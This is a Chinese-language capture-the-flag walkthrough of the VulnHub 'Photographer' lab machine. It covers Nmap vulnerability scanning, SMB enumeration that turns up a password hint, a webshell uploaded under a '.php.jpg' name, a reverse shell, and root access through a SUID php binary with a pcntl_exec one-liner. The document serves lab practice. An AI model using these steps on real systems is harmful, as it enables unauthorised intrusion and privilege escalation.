目录
下载链接:https://download.vulnhub.com/photographer/Photographer.ova
信息收集
root@kali:~# nmap -sC 192.168.243.155 --script=vuln
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-11 22:37 EDT
Nmap scan report for 192.168.243.155
Host is up (0.000080s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.243.155
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.243.155:80/elements.html
| Form id: name
| Form action: #
|
| Path: http://192.168.243.155:80/elements.html
| Form id: query
|_ Form action: #
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /images/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 127.0.1.1
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.243.155:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=M%3bO%3dD%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=S%3bO%3dD%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/js/?C=D%3bO%3dD%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=S%3bO%3dD%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=M%3bO%3dD%27%20OR%20sqlspider
| http://192.168.243.155:80/assets/?C=N%3bO%3dA%27%20OR%20sqlspider
|_ http://192.168.243.155:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8000/tcp open http-alt
| http-enum:
| /admin/: Possible admin folder
| /admin/index.html: Possible admin folder
| /app/: Potentially interesting folder
| /content/: Potentially interesting folder
| /error/: Potentially interesting folder
| /home/: Potentially interesting folder
|_ /index/: Potentially interesting folder
|_http-passwd: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:FB:21:5E (VMware)
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
SMB共享服务
Message-ID: <[email protected]>
Date: Mon, 20 Jul 2020 11:40:36 -0400
From: Agi Clarence <[email protected]>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Daisa Ahomi <[email protected]>
Subject: To Do - Daisa Website's
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Hi Daisa!
Your site is ready now.
Don't forget your secret, my babygirl ;)
访问80端口
访问8000 端口
https://www.exploit-db.com/exploits/48706
目录遍历
邮箱应该就是[email protected],密码猜测是babygirl
文件上传
root@kali:/usr/share/webshells/php# cp php-reverse-shell.php /cheying.php.jpg
修改信息上传木马
反弹shell
提权
/usr/bin/php7.2
www-data@photographer:/home/daisa$ find / -perm -4000 2>/dev/null
使用php命令提权
/usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"